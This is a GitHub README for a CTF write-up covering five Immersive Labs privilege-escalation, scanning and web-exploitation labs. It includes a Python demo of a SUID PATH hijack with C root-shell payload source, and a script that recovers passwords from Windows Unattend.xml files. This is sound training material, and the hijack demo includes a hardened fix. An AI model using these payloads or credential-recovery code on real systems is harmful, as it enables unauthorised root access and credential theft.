GitHub: raven-telepak/human-connection-ctf
# Human Connection Challenge: CTF Writeup
**Platform:** Immersive Labs
**Challenge:** Human Connection Challenge, Season 1
**Categories:** Basic OS Skills · Scanning · Web Exploitation · Linux · Windows
**Difficulty:** 6-7/10 per lab
**Status:** All five labs completed
## Overview
This writeup documents the exploitation chain across five practical labs covering Linux and Windows privilege escalation, network scanning and enumeration, and web application exploitation. Each lab involved gaining access to one or more target machines and recovering hidden tokens.
No hints or guided walkthroughs were used during initial attempts. Where research was required, sources are noted.
## Lab Index
| Lab | Key Techniques | Status |
|---|---|---|
| [Basic OS Skills](writeups/basic-os-skills.md) | SSH, SUID abuse, nano privilege escalation, Windows registry credential recovery | Completed |
| [Scanning](writeups/scanning.md) | nslookup, nmap, Netcat, sslscan, smbclient, WinRM, Metasploit | Completed |
| [Web Exploitation](writeups/web-exploitation.md) | robots.txt, dirb, Hydra, SQL injection, reflected XSS, LFI/directory traversal | Completed |
| [Linux](writeups/linux.md) | Redis exploit, Hydra SSH brute force, PATH hijacking via SUID, WebDAV reverse shell, crontab abuse | Completed |
| [Windows](writeups/windows.md) | SMB enumeration, SAM/SYSTEM hash dump, impacket-secretsdump, john, SQLMap, msfvenom, Unattend.xml credential recovery | Completed |
## Tools Reference
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| Netcat (`nc`) | Banner grabbing and raw TCP connections |
| sslscan | TLS/SSL configuration analysis |
| smbclient | SMB share enumeration and file access |
| Hydra | Credential brute forcing (SSH, HTTP, WebDAV) |
| Metasploit (`msfconsole`) | Exploit framework; Redis, WinRM, WebDAV modules |
| msfvenom | Payload generation for reverse shells |
| sqlmap | Automated SQL injection detection and exploitation |
| dirb | Web directory brute forcing |
| impacket-secretsdump | SAM/SYSTEM/SECURITY hash extraction |
| john | Password hash cracking |
| xfreerdp | RDP client for remote desktop access |
| gcc | C compiler used for SUID PATH hijack exploit |
## Structure
```
human-connection-ctf/
├── README.md                ← you are here
└── writeups/
    ├── basic-os-skills.md   ← SSH, SUID, Windows registry
    ├── scanning.md          ← nmap, smbclient, WinRM
    ├── web-exploitation.md  ← SQLi, XSS, LFI, Hydra
    ├── linux.md             ← Redis, PATH hijack, WebDAV, crontab
    └── windows.md           ← SMB, hash dump, SQLMap, Unattend.xml
```
## Key Takeaways
- SUID binaries that call helper programs by bare name (resolved through `$PATH`) can be abused by placing a same-named malicious binary in a directory that appears earlier in `$PATH`
- SAM and SYSTEM backup files exposed via SMB allow offline hash extraction with impacket-secretsdump in local mode, without touching LSASS on the live host
- SQL injection via `sqlmap --os-shell` can provide direct command execution on the database host, subject to the injected account's privileges and the DBMS's command-execution features
- Credentials stored in `Unattend.xml` (typically left under `C:\Windows\Panther`) are a common misconfiguration on Windows systems built with automated setup tools; the password value is base64-encoded UTF-16LE, not encrypted
- Cron jobs that run as root but execute scripts writable by non-root users are a reliable privilege escalation vector
- A host exposing WinRM (TCP 5985/5986) with known credentials provides full remote command execution without needing RDP
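As an added example (not code from this repo), the following Python script models the SUID PATH hijack from the first takeaway on an unprivileged account: a constructed stand-in target calls `ls` by bare name, a fake `ls` is dropped into an attacker-controlled directory that is prepended to `PATH`, and a hardened variant with a pinned `PATH` is run for comparison. The script name (`backup`), the `evil` directory and the embedded C payload are assumptions; no SUID bit is set, so only the lookup behaviour is reproduced, not the root shell.

```python
"""Added example (not from raven-telepak/human-connection-ctf): model a SUID
PATH hijack as an unprivileged user. Nothing here is SUID, so only the PATH
lookup is reproduced, not the privilege gain."""
import os
import stat
import subprocess
import tempfile

# Constructed stand-in for the vulnerable target. The lab binary was compiled C
# calling a helper through $PATH; a shell script resolves "ls" the same way.
# The name "backup" is assumed.
VULNERABLE_TARGET = "#!/bin/sh\nls /\n"

# Hardened counterpart: pin PATH to trusted directories before calling helpers
# (an absolute path to the helper is the other common fix).
HARDENED_TARGET = "#!/bin/sh\nPATH=/usr/bin:/bin\nexport PATH\nls /\n"

# The attacker's fake "ls". Against a real SUID-root target this would be the
# compiled payload below rather than a shell script: bash, for instance, resets
# the effective UID to the real UID unless started with -p.
FAKE_LS = "#!/bin/sh\necho HIJACKED\n"

# Assumed payload source for the lab's gcc step, shown for reference only
# (not compiled or run here): gcc payload.c -o ls
PAYLOAD_C = r"""
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setuid(0); setgid(0);              /* keep the root identity the SUID bit granted */
    execl("/bin/sh", "sh", (char *)0); /* root shell */
    return 1;
}
"""


def _write_exec(path, body):
    """Write a script and mark it executable for the owner."""
    with open(path, "w") as f:
        f.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)


def run_target(target_body, hijack=True):
    """Run target_body from a temp dir; when hijack is True an attacker-owned
    directory containing FAKE_LS is prepended to PATH first.
    Returns the first line the target printed ("HIJACKED" when the hijack lands)."""
    with tempfile.TemporaryDirectory() as work:
        target = os.path.join(work, "backup")
        _write_exec(target, target_body)
        evil = os.path.join(work, "evil")
        os.mkdir(evil)
        _write_exec(os.path.join(evil, "ls"), FAKE_LS)

        env = dict(os.environ)
        if hijack:
            env["PATH"] = evil + os.pathsep + env.get("PATH", "/usr/bin:/bin")
        out = subprocess.run([target], env=env, capture_output=True,
                             text=True, check=True)
        return out.stdout.splitlines()[0] if out.stdout else ""


if __name__ == "__main__":
    print("vulnerable, hijacked PATH:", run_target(VULNERABLE_TARGET))
    print("vulnerable, clean PATH:   ", run_target(VULNERABLE_TARGET, hijack=False))
    print("hardened, hijacked PATH:  ", run_target(HARDENED_TARGET))
```

The hardened target ignores the attacker's directory because it overwrites `PATH` before the lookup; the same effect is obtained by calling the helper through an absolute path, or in C by dropping `system()` in favour of `execve()` with a fixed path and a sanitised environment.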
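For the `Unattend.xml` takeaway, an added Python example (not from this repo) that parses a constructed `Unattend.xml` and recovers the stored credentials. The decoding rule is the one Windows applies to these files: when `<PlainText>` is `false`, `<Value>` is the base64 of the UTF-16LE password with the element's own name (`Password` or `AdministratorPassword`) appended as a suffix, and no key is involved. The sample file, usernames and passwords are constructed.

```python
"""Added example (not from raven-telepak/human-connection-ctf): recover the
credentials an Unattend.xml leaves behind after automated Windows setup."""
import base64
import xml.etree.ElementTree as ET

NS = "{urn:schemas-microsoft-com:unattend}"

# Constructed sample. On a real host the usual locations are
# C:\Windows\Panther\Unattend.xml and C:\Windows\Panther\Unattend\Unattend.xml.
# The AutoLogon value is base64(UTF-16LE("Pa55" + "Password")); the
# administrator password is left in clear text, which also occurs in the wild.
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>UABhADUANQBQAGEAcwBzAHcAbwByAGQA</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>Adm1n</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def decode_password(elem):
    """Decode a <Password> or <AdministratorPassword> element.

    When <PlainText> is false, <Value> is base64 of the UTF-16LE password with
    the element's tag name appended; strip that suffix to get the password.
    This is encoding, not encryption."""
    value = (elem.findtext(NS + "Value") or "").strip()
    plain = (elem.findtext(NS + "PlainText") or "true").strip().lower() == "true"
    if plain:
        return value
    decoded = base64.b64decode(value).decode("utf-16-le")
    suffix = elem.tag[len(NS):]  # "Password" or "AdministratorPassword"
    return decoded[:-len(suffix)] if decoded.endswith(suffix) else decoded


def recover_credentials(xml_text):
    """Return a list of (source, username, password) tuples found in the file."""
    root = ET.fromstring(xml_text)
    creds = []
    for auto in root.iter(NS + "AutoLogon"):
        pw = auto.find(NS + "Password")
        if pw is not None:
            user = (auto.findtext(NS + "Username") or "?").strip()
            creds.append(("AutoLogon", user, decode_password(pw)))
    for adm in root.iter(NS + "AdministratorPassword"):
        creds.append(("UserAccounts", "Administrator", decode_password(adm)))
    for acct in root.iter(NS + "LocalAccount"):  # <LocalAccounts> entries use the same scheme
        pw = acct.find(NS + "Password")
        if pw is not None:
            name = (acct.findtext(NS + "Name") or "?").strip()
            creds.append(("LocalAccount", name, decode_password(pw)))
    return creds


if __name__ == "__main__":
    for source, user, password in recover_credentials(SAMPLE_UNATTEND):
        print(f"{source:13} {user:15} {password}")
```

Run it against a file pulled from the target with `recover_credentials(open(path, encoding="utf-8-sig").read())`; the BOM-tolerant encoding matters because Windows writes these files with a UTF-8 BOM, which `ET.fromstring` otherwise rejects.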